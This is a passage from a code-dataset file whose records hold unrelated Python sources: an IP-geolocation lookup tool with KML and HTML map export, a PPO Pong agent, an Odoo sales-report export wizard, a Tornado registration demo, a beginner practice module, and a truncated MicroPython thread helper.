len(data)\n\t\t\tif size:\n\t\t\t\tdone = int(50 * downloaded / size)\n\t\t\t\tsys.stdout.write( \"\\r[%s%s] %d/%d bytes\" % ( '=' * done, ' ' * (50-done), downloaded, size ) )\n\t\t\telse:\n\t\t\t\tsys.stdout.write( \"\\r%d bytes\" % downloaded )\n\t\t\tsys.stdout.flush()\n\n\tif url and os.path.isfile(url):\n\t\tcopyfile(url, tmpfile.name)\n\telse:\n\t\tdownload(uri=url or DB_CITY, target=tmpfile)\n\tprint( '\\nunpacking...' )\n\tz = ZipFile( tmpfile )\n\tlang = input(\"select language (ja/zh-CN/fr/ru/en/pt-BR/de/es): \")\n\tdb_blocks = ''\n\tdb_locations = ''\n\tfor compressed_filepath in z.namelist():\n\t\tif compressed_filepath.find('GeoLite2-City-Blocks-IPv4.csv') != -1:\n\t\t\tdb_blocks = z.read(compressed_filepath).decode()\n\t\telif compressed_filepath.find('GeoLite2-City-Locations-%s.csv' % lang) != -1:\n\t\t\tdb_locations = z.read(compressed_filepath).decode()\n\tif not db_blocks:\n\t\tprint( \"'GeoLite2-City-Blocks-IPv4.csv' not found in %s\" % DB_CITY )\n\t\treturn False\n\telif not db_locations:\n\t\tprint( \"'GeoLite2-City-Locations-%s.csv' not found in %s\" % (lang,DB_CITY) )\n\t\treturn False\n\tz.close()\n\n\tprint( 'importing...' 
)\n\tsql.execute(\"DROP TABLE IF EXISTS geoip\")\n\tsql.execute(\"CREATE TABLE geoip(ip_begin INT, ip_end INT, network TEXT, asn TEXT, org TEXT, continent TEXT, country TEXT, city TEXT, lat FLOAT, long FLOAT)\")\n\tlocations = {}\n\t\n\tfor location in csv.DictReader(StringIO(db_locations)):\n\t\tlocations.update( { \n\t\t\tlocation['geoname_id'] : {\n\t\t\t\t'continent': location['continent_name'].lower(),\n\t\t\t\t'country': location['country_name'].lower(),\n\t\t\t\t'city': location['city_name'].lower()\n\t\t\t}\n\t\t} )\n\n\tn = 0\n\tfor block in csv.DictReader(StringIO(db_blocks)):\n\t\tlocation = locations.get( block['geoname_id'] )\n\t\tif location:\n\t\t\tcontinent = location['continent']\n\t\t\tcountry = location['country']\n\t\t\tcity = location['city']\n\t\telse:\n\t\t\tcontinent = country = city = ''\n\t\t#net = netaddr.IPNetwork( block['network'] ) slow!!!\n\t\tnet = cidr_to_min_max( block['network'] )\n\t\tsql.execute(\n\t\t\t\"INSERT INTO geoip(ip_begin,ip_end,network,continent,country,city,lat,long) VALUES(?,?,?,?,?,?,?,?)\",\n\t\t\t( str(min(net)), str(max(net)), block['network'], continent, country, city, block['latitude'], block['longitude'] )\n\t\t)\n\t\tif n % 25000 == 0:\n\t\t\tsys.stdout.write(\"\\r%d networks\" % n)\n\t\t\tsys.stdout.flush()\n\t\tn += 1\n\tsql.execute(\"CREATE INDEX ip_begin_index ON geoip(ip_begin)\")\n\tsql.execute(\"CREATE INDEX ip_end_index on geoip(ip_end)\")\n\tsql.execute(\"CREATE INDEX network_index ON geoip(network)\")\n\tdb.commit()\n\tsys.stdout.write(\"\\r%d networks\\n\" % n)\n\tsys.stdout.flush()\n\n\ttry:\n\t\ttmpfile.truncate()\n\t\tdownload(uri=DB_ASN, target=tmpfile)\n\t\tprint( '\\nunpacking...' )\n\t\tz = ZipFile( tmpfile )\n\t\tdb_asn = ''\n\t\tfor compressed_filepath in z.namelist():\n\t\t\tif compressed_filepath.find('GeoLite2-ASN-Blocks-IPv4.csv') != -1:\n\t\t\t\tdb_asn = z.read(compressed_filepath)\n\t\tif not db_asn:\n\t\t\tprint( \"'GeoLite2-ASN-Blocks-IPv4.csv' not found in %s\" % DB_ASN )\n\t\t\treturn False\n\t\tprint( 'importing...' )\n\t\tn = 1\n\t\tfor asn in csv.DictReader( BytesIO(db_asn) ):\n\t\t\tnet = asn['network']\n\t\t\tnum = asn['autonomous_system_number']\n\t\t\torg = asn['autonomous_system_organization']\n\t\t\tsql.execute( \"UPDATE geoip SET asn=?, org=? WHERE network = ?\", (num,org,net) )\n\t\t\tif n % 25000 == 0:\n\t\t\t\tsys.stdout.write(\"\\r%d ASNs\" % n)\n\t\t\t\tsys.stdout.flush()\n\t\t\tn += 1\n\texcept Exception as e:\n\t\tprint(str(e))\n\n\tdb.commit()\n\tsys.stdout.write(\"\\r%d ASNs\\n\" % n)\n\tsys.stdout.flush()\n\t\n\ndef do_search(items, params):\n\tglobal squares, circles\n\tstatement = []\n\targs = []\n\tdef _sign(l):\n\t\tl = l.upper()\n\t\tfor piece,sign in list({'N':1, 'S':-1, 'E': 1, 'W': -1}.items()):\n\t\t\tif l.find(piece) != -1:\n\t\t\t\treturn float( l.replace(piece,'') ) * sign\n\t\treturn float(l)\n\tdef _check_square(from_latitude,from_longitude,to_latitude,to_longitude):\n\t\tif from_latitude > to_latitude:\n\t\t\tfrom_latitude,to_latitude = to_latitude,from_latitude\n\t\tif from_longitude > to_longitude:\n\t\t\tfrom_longitude,to_longitude = to_longitude,from_longitude\n\t\treturn from_latitude,from_longitude,to_latitude,to_longitude\n\n\tfor attr,val in list(params.items()):\n\t\tif attr == 'square':\n\t\t\t(from_latitude,from_longitude,to_latitude,to_longitude) = _check_square( *list(map( _sign, val.split(',') ) ))\n\t\t\tstatement.append( \"(lat >= ? AND lat <= ? AND long >= ? 
AND long <= ?)\" )\n\t\t\targs.extend( [from_latitude, to_latitude, from_longitude, to_longitude] )\n\t\t\tsquares.append( [from_latitude, from_longitude, to_latitude, to_longitude] )\n\t\telif attr == 'circle':\n\t\t\tlat, lon, radius_km = val.split(',')\n\t\t\tlat, lon = list(map( _sign, [lat, lon] ))\n\t\t\tradius = float(radius_km) * ( 1.0 / 110.574 )\n\t\t\t#radius = float(radius_km) * ( 1.0 / ( 111.320*math.cos(lat) ) )\n\t\t\tstatement.append( \"( ( (lat - ?)*(lat - ?) + (long - ?)*(long - ?) ) < ? )\" )\n\t\t\targs.extend( [lat, lat, lon, lon, radius*radius] )\n\t\t\tcircles.append( [lat, lon, radius, float(radius_km)] )\n\t\telif attr == 'ipaddr':\n\t\t\tip, ip = cidr_to_min_max(val)\n\t\t\tstatement.append( \"(network = (SELECT network FROM geoip WHERE ? BETWEEN ip_begin AND ip_end ORDER BY ip_begin DESC LIMIT 1) )\" )\n\t\t\targs.append( ip )\n\t\telif attr == 'network':\n\t\t\t_min, _max = cidr_to_min_max( val )\n\t\t\tstatement.append( \"(network in (SELECT network FROM geoip WHERE ? BETWEEN ip_begin AND ip_end AND ? BETWEEN ip_begin AND ip_end ORDER BY ip_begin DESC LIMIT 1) )\" )\n\t\t\targs.extend( [_min, _max] )\n\t\telif attr == 'networks':\n\t\t\t_min, _max = cidr_to_min_max( val )\n\t\t\tstatement.append( \"(network in (SELECT network FROM geoip WHERE ip_begin BETWEEN ? AND ? AND ip_end BETWEEN ? AND ?) )\" )\n\t\t\targs.extend( [_min, _max, _min, _max] )\n\t\telif attr.find('no_') != -1:\n\t\t\tstatement.append( \"(%s NOT LIKE ?)\" % attr[3:] )\n\t\t\targs.append( val )\n\t\telse:\n\t\t\tstatement.append( \"(%s LIKE ?)\" % attr )\n\t\t\targs.append( val )\n\n\tresults = []\n\tquery = ( \"SELECT %s FROM geoip WHERE \" % ','.join(items) ) + ' AND '.join(statement)\n\tfor result in sql.execute( query, args ):\n\t\tresults.append( dict( list(zip(items,result)) ) )\n\treturn results\n\ndef search(items, params):\n\tresults = []\n\tfor attrs in itertools.product( *list(params.values()) ):\n\t\tresults += do_search( items, dict( list(zip(list(params.keys()), attrs)) ) )\n\treturn results\n\ndef geo_search(args):\n\tparams = {}\n\tfor attr,vals in list(args.items()):\n\t\tparams[attr] = []\n\t\tfor val in vals:\n\t\t\tif os.path.isfile(val):\n\t\t\t\tinfile = val\n\t\t\t\twith open(infile) as f:\n\t\t\t\t\tfor line in f:\n\t\t\t\t\t\tval = line.split('\\n')[0]\n\t\t\t\t\t\tparams[attr].append(val)\n\t\t\telif val == '-':\n\t\t\t\twhile True:\n\t\t\t\t\ttry:\n\t\t\t\t\t\tval = input()\n\t\t\t\t\t\tparams[attr].append(val)\n\t\t\t\t\texcept:\n\t\t\t\t\t\tbreak\n\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tparams[attr].append(val)\n\treturn search(items, params)\n\ndef resolve_whois(netblocks):\n\tfrom ipwhois import IPWhois\n\tfor netblock in netblocks:\n\t\ttry:\n\t\t\tnetname = IPWhois( netblock['network'].split('/')[0] ).lookup_whois()['nets'][0]['name']\n\t\t\tnetblock['netname'] = netname[:20]+'..' if len(netname) > 20 else netname\n\t\texcept:\n\t\t\tpass\n\ndef resolve_ripe(netblocks):\n\timport rwhois\n\tfor netblock in netblocks:\n\t\tif netblock.get('network'):\n\t\t\tresults = rwhois.do_search( [\"netname\"], { \"inetnum\": netblock['network'] } )\n\t\t\tnetname = results[0]['netname'] if results and results[0].get('netname') else ''\n\t\t\tif netname:\n\t\t\t\tnetblock['netname'] = netname[:20]+'..' 
if len(netname) > 20 else netname\n\ndef save_kml(netblocks, outfile):\n\tfrom pykml.factory import KML_ElementMaker as KML\n\tfrom lxml import etree\n\timport math\n\n\tdef kml(name, lat,lon):\n\t\treturn KML.Placemark( \n\t\t\tKML.name(name),\n\t\t\tKML.Point( \n\t\t\t\tKML.coordinates( \"%(long).04f,%(lat).04f\" % { 'lat': lat, 'long': lon } )\n\t\t\t\t) \n\t\t\t) \n\n\tdef draw_square(from_latitude, from_longitude, to_latitude, to_longitude):\n\t\treturn KML.Placemark(\n\t\t\tKML.name('square'),\n\t\t\tKML.Style(\n\t\t\t\tKML.LineStyle(\n\t\t\t\t\tKML.color('ff0000ff'),\n\t\t\t\t\tKML.width(2)\n\t\t\t\t)\n\t\t\t),\n\t\t\tKML.LineString(\n\t\t\t\tKML.coordinates(\n\t\t\t\t\t'%.04f,%.04f,0.0 ' % (from_longitude,from_latitude) +\n\t\t\t\t\t'%.04f,%.04f,0.0 ' % (to_longitude,from_latitude) +\n\t\t\t\t\t'%.04f,%.04f,0.0 ' % (to_longitude,to_latitude) +\n\t\t\t\t\t'%.04f,%.04f,0.0 ' % (from_longitude,to_latitude) +\n\t\t\t\t\t'%.04f,%.04f,0.0 ' % (from_longitude,from_latitude)\n\t\t\t\t)\n\t\t\t)\n\t\t)\n\n\tdef draw_circle(latitude, longitude, radius):\n\t\tn = 100\n\t\treturn KML.Placemark(\n\t\t\tKML.name('circle'),\n\t\t\tKML.Style(\n\t\t\t\tKML.LineStyle(\n\t\t\t\t\tKML.color('ff0000ff'),\n\t\t\t\t\tKML.width(2)\n\t\t\t\t)\n\t\t\t),\n\t\t\tKML.LineString(\n\t\t\t\tKML.coordinates(\n\t\t\t\t\t' '.join( map( lambda xy:'%.04f,%.04f,0.0 '%(xy[0],xy[1]), \n\t\t\t\t\t\t\t[ ( longitude+math.cos(2*math.pi/n*x)*radius, latitude+math.sin(2*math.pi/n*x)*radius ) for x in range(0,n+1) ]\n\t\t\t\t\t\t)\n\t\t\t\t\t)\n\t\t\t\t)\n\t\t\t)\n\t\t)\n\n\tpoints = {}\n\tplaces = []\n\tfor netblock in netblocks:\n\t\tlat,lon,network,netname = netblock.get('lat'), netblock.get('long'), netblock.get('network'), netblock.get('netname','')\n\t\tif lat and lon:\n\t\t\tpoint = \"%s/%s\" % (lat, lon)\n\t\t\tif points.get(point):\n\t\t\t\tpoints[point].append( ' '.join( [network,netname] ) )\n\t\t\telse:\n\t\t\t\tpoints[point] = [network]\n\tfor point in list(points.keys()):\n\t\tlat,lon = list(map( float, point.split(\"/\") ))\n\t\tplaces.append( kml( \"\\n\".join( points[point] ), lat, lon ) )\n\tfor square in squares:\n\t\tplaces.append( draw_square( *list(map( float, square ) ) ))\n\tfor circle in circles:\n\t\tplaces.append( draw_circle( *list(map( float, circle[:3] ) ) ))\n\t\n\twith open(outfile, \"wb\") as o:\n\t\to.write( etree.tostring( KML.Folder( *tuple(places) ) ) )\n\ndef html_escape(text):\n\treturn text.replace(\"`\", \"'\").replace(\"'\", \"'\").replace('\"', \""\")\n\ndef save_html(netblocks, items, outfile):\n\timport folium\n\tfolium_map = folium.Map(location=[ netblocks[0].get('lat'), netblocks[0].get('long') ], zoom_start=10, tiles=\"CartoDB dark_matter\")\n\n\tcoordinates = {}\n\tfor netblock in netblocks:\n\t\tabout_netblock = ' | '.join( [str( netblock.get(i) or '' ) for i in items] )\n\t\tif netblock.get('lat') and netblock.get('long'):\n\t\t\tif \"%.04f,%.04f\" % ( netblock.get('lat'), netblock.get('long') ) in list(coordinates.keys()):\n\t\t\t\tcoordinates[ \"%.04f,%.04f\" % ( netblock.get('lat'), netblock.get('long') ) ] += \"
\" + html_escape(about_netblock)\n\t\t\telse:\n\t\t\t\tcoordinates[ \"%.04f,%.04f\" % ( netblock.get('lat'), netblock.get('long') ) ] = html_escape(about_netblock)\n\t\t\n\tfor lat_long,networks in list(coordinates.items()):\n\t\tfolium.CircleMarker(location=list(map(float, lat_long.split(','))), popup=networks, radius=1).add_to(folium_map)\n\n\tfor circle in circles:\n\t\tfolium.Circle(location=list(map(float, circle[:2])), radius=circle[3]*1000, color=\"red\").add_to(folium_map)\n\n\tfor square in squares:\n\t\tprint( list(map(float, square)) )\n\t\tfrom_latitude, from_longitude, to_latitude, to_longitude = list(map(float, square))\n\t\tlocations = [ (from_latitude,from_longitude) ]\n\t\tlocations.append( (from_latitude,to_longitude) )\n\t\tlocations.append( (to_latitude,to_longitude) )\n\t\tlocations.append( (to_latitude,from_longitude) )\n\t\tlocations.append( (from_latitude,from_longitude) )\n\t\tfolium.PolyLine(locations, weight=1, color=\"red\").add_to(folium_map)\n\n\tfolium_map.save(outfile)\n\n\ndef get_stat(netblocks, items):\n\tstatistics = {}\n\tips = 0\n\tfor item in items:\n\t\tif item == 'network':\n\t\t\tfor network in [n.get('network') for n in netblocks]:\n\t\t\t\t_min,_max = cidr_to_min_max(network)\n\t\t\t\tips += _max - _min\n\t\t\tstatistics[item] = '%d ip' % ips\n\t\telse:\n\t\t\tvals = set()\n\t\t\tfor val in [str(n.get(item)) or '' for n in netblocks]:\n\t\t\t\tvals.add(val)\n\t\t\tstatistics[item] = '%d %s' % ( len(vals), item )\n\treturn statistics\n\ndef print_row( values, margins ):\n\trow = []\n\tfor i in range( len(values) ):\n\t\trow.append( values[i] + \" \" * ( margins[i] - len( values[i]) ) )\n\tprint(' | '.join(row))\n\n\ndef main( argv=['-h'] ):\n\tglobal items\n\targs = arg_parser.parse_args(argv)\n\n\titems = args.items\n\tnetblocks = []\n\n\tif args.version:\n\t\tprint(__version__)\n\telif args.update != None:\n\t\tfrom tempfile import NamedTemporaryFile\n\t\ttmpfile = NamedTemporaryFile()\n\t\ttry:\n\t\t\tif args.update:\n\t\t\t\tupdate(tmpfile, url=args.update)\n\t\t\telse:\n\t\t\t\tupdate(tmpfile)\n\t\texcept Exception as e:\n\t\t\tprint(str(e))\n\t\ttmpfile.close()\n\telif args.info:\n\t\tshow_db_info()\n\telse:\n\t\tparams = {}\n\t\tif args.ipaddr:\n\t\t\tparams['ipaddr'] = args.ipaddr\n\t\tif args.network:\n\t\t\tparams['network'] = args.network\n\t\tif args.networks:\n\t\t\tparams['networks'] = args.networks\n\t\tif args.asn:\n\t\t\tparams['asn'] = args.asn\n\t\tif args.org:\n\t\t\tparams['org'] = args.org\n\t\tif args.city:\n\t\t\tparams['city'] = args.city\n\t\tif args.country:\n\t\t\tparams['country'] = args.country\n\t\tif args.continent:\n\t\t\tparams['continent'] = args.continent\n\t\tif args.lat_long_lat_long:\n\t\t\tparams['square'] = args.lat_long_lat_long\n\t\tif args.lat_long_km:\n\t\t\tparams['circle'] = args.lat_long_km\n\n\t\tif args.save_to_html:\n\t\t\tif not 'lat' in items:\n\t\t\t\titems.append('lat')\n\t\t\tif not 'long' in items:\n\t\t\t\titems.append('long')\n\n\t\tif params:\n\t\t\tif check_db():\n\t\t\t\tnetblocks = geo_search( params )\n\t\t\telse:\n\t\t\t\tprint( \"update database first\" )\n\t\t\t\treturn\n\n\tif args.resolve_ripe:\n\t\tresolve_ripe( netblocks )\n\t\titems.insert(1, \"netname\")\n\telif args.resolve_whois:\n\t\tresolve_whois( netblocks )\n\t\titems.insert(1, \"netname\")\n\n\tif netblocks and args.save_to_kml:\n\t\tsave_kml(netblocks, args.save_to_kml)\n\telif netblocks and args.save_to_html:\n\t\titems.remove('lat')\n\t\titems.remove('long')\n\t\tsave_html(netblocks, items, 
args.save_to_html)\n\telif netblocks:\n\t\tsummary = get_stat(netblocks, items)\n\t\tmargins = [max( [len(str(n.get(i) or '')) for n in netblocks] + [len(i), len(summary[i])] ) for i in items]\n\t\tif len(items) > 1:\n\t\t\tprint_row(tuple(items), margins )\n\t\t\tprint_row(tuple( ['-'*m for m in margins] ), margins )\n\t\t\tfor netblock in netblocks:\n\t\t\t\tprint_row([str( netblock.get(i) or '' ) for i in items], margins )\n\t\t\tprint_row(tuple( ['-'*m for m in margins] ), margins )\n\t\t\tprint_row(tuple( [str( summary.get(i) or '' ) for i in items] ), margins )\n\n\t\telse:\n\t\t\tfor netblock in netblocks:\n\t\t\t\tprint_row([str( netblock.get(i) or '' ) for i in items], [0] )\n\n\tif db:\n\t\tdb.close()\n\nif __name__ == '__main__':\n\tmain( sys.argv[1:] )\n","sub_path":"georipe/geoip.py","file_name":"geoip.py","file_ext":"py","file_size_in_byte":17643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"155909925","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport numpy as np\nfrom tqdm import tqdm\nimport torch.optim as optim\nfrom parallelEnv import parallelEnv\nimport pong_utils\n\nclass PPO:\n def __init__(self, envs):\n self.device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n self.policy = Policy().to(self.device)\n self.envs = envs\n\n def clipped_surrogate(self, old_probs, states, actions, rewards,\n discount=0.995, epsilon=0.1, beta=0.01):\n discount = discount ** np.arange(len(rewards))\n rewards = np.asarray(rewards) * discount[:, np.newaxis]\n\n # convert rewards to future rewards\n rewards_future = rewards[::-1].cumsum(axis=0)[::-1]\n\n mean = np.mean(rewards_future, axis=1)\n std = np.std(rewards_future, axis=1) + 1.0e-10\n\n rewards_normalized = (rewards_future - mean[:, np.newaxis]) / std[:, np.newaxis]\n\n # convert everything into pytorch tensors and move to gpu if available\n actions = torch.tensor(actions, dtype=torch.int8, device=self.device)\n old_probs = torch.tensor(old_probs, dtype=torch.float, device=self.device)\n rewards = torch.tensor(rewards_normalized, dtype=torch.float, device=self.device)\n\n # convert states to policy (or probability)\n new_probs = self.states_to_prob(states)\n new_probs = torch.where(actions == pong_utils.RIGHT, new_probs, 1.0 - new_probs)\n\n # ratio for clipping\n ratio = new_probs / old_probs\n\n # clipped function\n clip = torch.clamp(ratio, 1 - epsilon, 1 + epsilon)\n clipped_surrogate = torch.min(ratio * rewards, clip * rewards)\n\n # include a regularization term\n # this steers new_policy towards 0.5\n # add in 1.e-10 to avoid log(0) which gives nan\n entropy = -(new_probs * torch.log(old_probs + 1.e-10) + \\\n (1.0 - new_probs) * torch.log(1.0 - old_probs + 1.e-10))\n\n # this returns an average of all the entries of the tensor\n # effective computing L_sur^clip / T\n # averaged over time-step and number of trajectories\n # this is desirable because we have normalized our rewards\n return torch.mean(clipped_surrogate + beta * entropy)\n\n\n def train(self, episode=800, discount_rate = 0.99, epsilon = 0.1, beta=0.01,\n tmax = 320, SGD_epoch = 4, lr=1e-4):\n self.optimizer = optim.Adam(self.policy.parameters(), lr=lr)\n # keep track of progress\n mean_rewards = []\n\n for e in tqdm(range(episode)):\n # collect trajectories\n old_probs, states, actions, rewards = \\\n self.collect_trajectories(tmax=tmax)\n\n total_rewards = np.sum(rewards, axis=0)\n\n # gradient ascent step\n for _ in range(SGD_epoch):\n # 
uncomment to utilize your own clipped function!\n # L = -clipped_surrogate(policy, old_probs, states, actions, rewards, epsilon=epsilon, beta=beta)\n\n L = -self.clipped_surrogate(old_probs, states, actions, rewards,\n epsilon=epsilon, beta=beta)\n self.optimizer.zero_grad()\n L.backward()\n self.optimizer.step()\n del L\n\n # the clipping parameter reduces as time goes on\n epsilon *= .999\n\n # the regulation term also reduces\n # this reduces exploration in later runs\n beta *= .995\n\n # get the average reward of the parallel environments\n mean_rewards.append(np.mean(total_rewards))\n\n # display some progress every 20 iterations\n if (e + 1) % 20 == 0:\n print(\"Episode: {0:d}, score: {1:f}\".format(e + 1, np.mean(total_rewards)))\n print(total_rewards)\n\n\n def states_to_prob(self, states):\n states = torch.stack(states)\n policy_input = states.view(-1, *states.shape[-3:])\n return self.policy(policy_input).view(states.shape[:-3])\n\n # collect trajectories for a parallelized parallelEnv object\n def collect_trajectories(self, tmax=200, nrand=5):\n\n # number of parallel instances\n n = len(self.envs.ps)\n\n # initialize returning lists and start the game!\n state_list = []\n reward_list = []\n prob_list = []\n action_list = []\n\n self.envs.reset()\n\n # start all parallel agents\n self.envs.step([1] * n)\n\n # perform nrand random steps\n for _ in range(nrand):\n fr1, re1, _, _ = self.envs.step(np.random.choice([pong_utils.RIGHT, pong_utils.LEFT], n))\n fr2, re2, _, _ = self.envs.step([0] * n)\n\n for t in range(tmax):\n\n # prepare the input\n # preprocess_batch properly converts two frames into\n # shape (n, 2, 80, 80), the proper input for the policy\n # this is required when building CNN with pytorch\n batch_input = pong_utils.preprocess_batch([fr1, fr2])\n\n # probs will only be used as the pi_old\n # no gradient propagation is needed\n # so we move it to the cpu\n probs = self.policy(batch_input).squeeze().cpu().detach().numpy()\n\n action = np.where(np.random.rand(n) < probs, pong_utils.RIGHT, pong_utils.LEFT)\n probs = np.where(action == pong_utils.RIGHT, probs, 1.0 - probs)\n\n # advance the game (0=no action)\n # we take one action and skip game forward\n fr1, re1, is_done, _ = self.envs.step(action)\n fr2, re2, is_done, _ = self.envs.step([0] * n)\n\n reward = re1 + re2\n\n # store the result\n state_list.append(batch_input)\n reward_list.append(reward)\n prob_list.append(probs)\n action_list.append(action)\n\n # stop if any of the trajectories is done\n # we want all the lists to be retangular\n if is_done.any():\n break\n\n # return pi_theta, states, actions, rewards, probability\n return prob_list, state_list, \\\n action_list, reward_list\n\nclass Policy(nn.Module):\n def __init__(self):\n super(Policy, self).__init__()\n # 80x80x2 to 38x38x4\n # 2 channel from the stacked frame\n self.conv1 = nn.Conv2d(2, 4, kernel_size=6, stride=2, bias=False)\n # 38x38x4 to 9x9x32\n self.conv2 = nn.Conv2d(4, 16, kernel_size=6, stride=4)\n self.size = 9 * 9 * 16\n\n # two fully connected layer\n self.fc1 = nn.Linear(self.size, 256)\n self.fc2 = nn.Linear(256, 1)\n\n # Sigmoid to\n self.sig = nn.Sigmoid()\n\n def forward(self, x):\n x = F.relu(self.conv1(x))\n x = F.relu(self.conv2(x))\n x = x.view(-1, self.size)\n x = F.relu(self.fc1(x))\n return self.sig(self.fc2(x))\n\nif __name__ == '__main__':\n envs = parallelEnv('PongDeterministic-v4', n=8, seed=1234)\n agent = PPO(envs=envs)\n 
agent.train()\n","sub_path":"Pong-PPO/ppo_single_output.py","file_name":"ppo_single_output.py","file_ext":"py","file_size_in_byte":7058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"193815115","text":"# -*- encoding: utf-8 -*-\n\nimport base64\n\nfrom odoo import api, fields, models\nfrom odoo.addons.web.controllers.main import ExcelExport\n\n\nclass PrintDetailSaleAnalysis(models.TransientModel):\n _name = 'print.detail.sale.analysis'\n _description = 'Print Detail Sale Analysis'\n\n start_date = fields.Date(string='Start Date', required=True)\n end_date = fields.Date(string='End Date', required=True)\n order_type_ids = fields.Many2many('sale.order.type', string='Order Type', required=True)\n\n @api.multi\n def action_print(self):\n DetailSaleReport = self.env['sale.report.extend']\n DetailSaleReport.init()\n\n domain = [\n ('date', '>=', self.start_date), ('date', '<=', self.end_date),\n ('order_type', 'in', self.order_type_ids.ids)\n ]\n records = DetailSaleReport.search(domain, order=\"date desc, name\")\n value_list = []\n field_list = [\n 'Company', 'Product Category', 'Sub Category', 'Branch Name', 'Area', 'SO Number', 'SO Date',\n 'Customer Name', 'Product Name', 'Ordered Qty', 'Delivered Qty', 'Pending Qty', 'Untaxed',\n 'Total', 'Salesperson', 'Sales Team', 'Order Type'\n ]\n for record in records:\n partner_name = record.title.name + ' ' + record.partner_id.name.strip() if record.title.name else record.partner_id.name.strip()\n value_list.append([\n record.company_id.name or '', record.categ_id.name or '', record.product_sub_category_id.name or '', record.branch_id.name or '',\n record.area_id.name or '', record.name or '', record.date or '', partner_name,\n record.product_id.name.strip(), record.product_uom_qty, record.qty_delivered, record.qty_pending,\n record.price_subtotal, record.price_total, record.user_id.name or '', record.team_id.name or '',\n record.order_type.name or ''\n ])\n\n obj = ExcelExport()\n data = obj.from_data(field_list, value_list)\n\n values = {\n 'name': \"Pending Order Report\",\n 'datas_fname': 'pending_order.xls',\n 'res_model': 'ir.ui.view',\n 'res_id': False,\n 'type': 'binary',\n 'public': True,\n 'datas': base64.b64encode(data),\n }\n\n # Using your data create as attachment\n attachment_id = self.env['ir.attachment'].sudo().create(values)\n\n #Prepare your download URL\n download_url = '/web/content/' + str(attachment_id.id) + '?download=True'\n base_url = self.env['ir.config_parameter'].sudo().get_param('web.base.url')\n\n # Return so it will download in your system\n return {\n \"type\": \"ir.actions.act_url\",\n \"url\": str(base_url) + str(download_url),\n \"target\": \"new\",\n }\n","sub_path":"analysis_detailed_sale/wizard/print_detail_sale_analysis.py","file_name":"print_detail_sale_analysis.py","file_ext":"py","file_size_in_byte":2837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"375009455","text":"#!/usr/bin/env python3\n# -*- coding: UTF-8 -*-\n# @Time : 2020/05/03 18:03\n# @Email : lukeqinlu@yeah.net\n# @Author : Luke\n# @File : example02.py\n# @notice :\n\n\nimport os\nimport re\n\n\nimport tornado.ioloop\nimport tornado.web\nimport platform\n\nfrom tornado.options import define, options, parse_command_line\n\n\ndefine('port', default=8000, type=int)\n\nusers = {}\n\n\nclass User(object):\n \"\"\"用户\"\"\"\n\n def __init__(self, nickname, gender, birthday):\n self.nickname = nickname\n self.gender = gender\n 
self.birthday = birthday\n\n\nclass MainHandler(tornado.web.RequestHandler):\n def get(self):\n nickname = self.get_cookie('nickname')\n if nickname in users:\n self.render('userinfo.html', user=users[nickname])\n else:\n self.render('userform.html', hint='请填写个人信息')\n\n\nclass UserHandler(tornado.web.RequestHandler):\n def post(self):\n nickname = self.get_body_argument('nickname').strip()\n gender = self.get_body_argument('gender')\n birthday = self.get_body_argument('birthday')\n\n if not re.fullmatch(r'\\w{6,20}', nickname):\n self.render('userform.html', hint='请输入有效的昵称')\n elif nickname in users:\n self.render('userform.html', hint='昵称已经被使用过')\n else:\n users[nickname] = User(nickname, gender, birthday)\n self.set_cookie('nickname', nickname, expires_days=7)\n self.render('userinfo.html', user=users[nickname])\n\n\ndef main():\n if platform.system() == \"Windows\":\n import asyncio\n asyncio.set_event_loop_policy(asyncio.WindowsSelectorEventLoopPolicy())\n parse_command_line()\n app = tornado.web.Application(\n handlers=[(r'/', MainHandler),\n (r'/register', UserHandler)],\n template_path=os.path.join(os.path.dirname(__file__), 'templates'))\n app.listen(options.port)\n tornado.ioloop.IOLoop.current().start()\n\nif __name__ == '__main__':\n main()","sub_path":"python_100_days/day61_65/tornado/example02.py","file_name":"example02.py","file_ext":"py","file_size_in_byte":2001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"63725000","text":"\"\"\"Test module\"\"\"\n\ndef print_float(nbr):\n \"\"\"Print floating point number shorten at third decimal\n and replace '.' by ','.\"\"\"\n if type(nbr) is not float:\n raise TypeError(\"Type float expected.\")\n nbr = str(nbr)\n nbr = nbr.split('.')\n print(nbr[0] + ',' + nbr[1][:3])\n\ndef is_bisextile(year):\n year = input(\"Choose a year : \")\n year = int(year)\n if not year % 4:\n if not year % 100:\n if not year % 400:\n print(\"bissexile\")\n else:\n print(\"not bissexile\")\n else:\n print(\"bissexile\")\n else:\n print(\"not bissexile\")\n\ndef my_print(*values, sep=' ', end='\\n'):\n string = ''\n for elem in values:\n string = string + str(sep) + str(elem)\n string += str(end)\n string = string[1:]\n print(string, end='', sep='')\n\ninventaire = [\n (\"pommes\", 22),\n (\"melons\", 4),\n (\"poires\", 18),\n (\"fraises\", 76),\n (\"prunes\", 51),\n]\n","sub_path":"openclassroom_python/test_module.py","file_name":"test_module.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"210316014","text":"import pyb\r\nimport syncpri\r\nimport _thread\r\n\r\n\r\n# callback is a func that accept only a param\r\ndef map_to_thread(callback, *args):\r\n\tdef func(f):\r\n\t\tdef wrapper():\r\n\t\t\tf(*args)\r\n\t\treturn Mapper(callback, wrapper, nargs=1, forward_args=False)\r\n\treturn func\r\n\r\n\r\nclass Mapper(object):\r\n\t__default_event = syncpri.Event(mutex=syncpri.SpinMutex(restrict_owner=False))\r\n\t__internal_thread_running = False\r\n\t__mappers = []\r\n\r\n\t@classmethod\r\n\tdef __internal_thread(cls):\r\n\t\twhile True:\r\n\t\t\tsyncpri.Event.wait_any(map(lambda m: m.__event, cls.__mappers))\r\n\t\t\tfor mapper in cls.__mappers:\r\n\t\t\t\tif mapper.__raised:\r\n\t\t\t\t\tmapper.__raised = False\r\n\t\t\t\t\tif 